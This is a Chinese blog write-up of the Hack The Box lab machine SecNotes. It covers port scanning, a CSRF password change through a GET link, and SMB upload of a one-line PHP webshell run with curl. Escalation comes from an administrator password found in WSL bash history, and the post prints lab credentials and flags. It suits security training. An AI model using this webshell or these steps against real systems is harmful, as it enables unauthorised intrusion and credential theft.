当前位置: 首页 > news >正文

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Webshell上传+Linux子系统命令历史记录泄露权限提升

信息收集

IP AddressOpening Ports
10.10.10.97TCP:80,445,8808

$ nmap -p- 10.10.10.97 --min-rate 1000 -sC -sV

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp  open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

XSRF & SMB Webshell

1.创建用户

http://10.10.10.97/register.php

image-1.png

2.登录

image.png

3.联系页面

image-2.png

image-3.png

http://10.10.16.24/test

image-4.png

联系页面提交URL后靶机会自动访问该链接

4.修改密码

修改密码页面可以通过GET请求进行修改密码,并且不需要提供原始密码

image-6.png

image-5.png

5.在反馈联系页面发送链接,让tyler@secnotes.htb靶机访问触发XSRF漏洞

http://10.10.10.97/change_pass.php?password=test123&confirm_password=test123&submit=submit

image-7.png

image-8.png

存在SMB凭证,通过SMB上传webshell

\\secnotes.htb\new-site tyler / 92g!mA8BGjOirkL%OG*&

$ smbmap -H 10.10.10.97 -u tyler -p '92g!mA8BGjOirkL%OG*&'

image-9.png

$ smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' //10.10.10.97/new-site

image-10.png

$ echo '<?php system($_GET[1]); ?>'>/tmp/shell.php

smb: \> put /tmp/shell.php shell.php

$ curl 'http://10.10.10.97:8808/shell.php?1=whoami'

image-11.png

User.txt

c820c9c749a18ad20cd753302bcde81d

权限提升

image-12.png

PS C:\inetpub\new-site> type C:\Users\tyler\Desktop\bash.lnk

image-13.png

PS C:\inetpub\new-site> \windows\system32\bash.exe

PS C:\inetpub\new-site> Get-ChildItem -Recurse -Path C:\ -Filter "bash.exe"

image-14.png

PS C:\inetpub\new-site> cd C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root

PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> type .bash_history

从Linux子系统中的.bash_history中获取到管理员密码

image-15.png

$ winexe -U '.\administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe

image-17.png

Root.txt

da93ba016133741828c0cd57abb916ad


http://www.mrgr.cn/news/15024.html

相关文章:

  • 单片机使用cJSON的坑
  • TCP、HTTP以及RPC的梳理
  • Linux基础1-基本指令6(grep,zip,tar,查看系统等命令)
  • uniapp uni-popup底部弹框留白 底部颜色修改 滚动穿刺
  • 【原型设计工具评测】Axure、Figma、Sketch三强争霸
  • 【Java 数据结构】HashMap和HashSet介绍
  • 深入理解 XSS 漏洞:原理、危害与防范
  • LeetCode 热题100-63 搜索插入位置
  • RabbitMQ 集群与高可用性
  • Golang | Leetcode Golang题解之第384题打乱数组
  • Bootstrap 滚动监听(Scrollspy)插件
  • 大模型技术 | 基于 Langchain 和 Streamlit,构建多 PDF RAG 聊天机器人
  • 红蓝对抗,你懂得多少?
  • 铭江酒趣乐园小程序
  • Linux学习(13)计算机网络基础概论
  • 深度学习实用方法 - 调试策略篇
  • MATLAB学习笔记4
  • 构建高可用的微服务架构:Spring Cloud Consul与负载均衡
  • 嵌入式数据库
  • 根据两个位置的经纬度,计算其距离和方位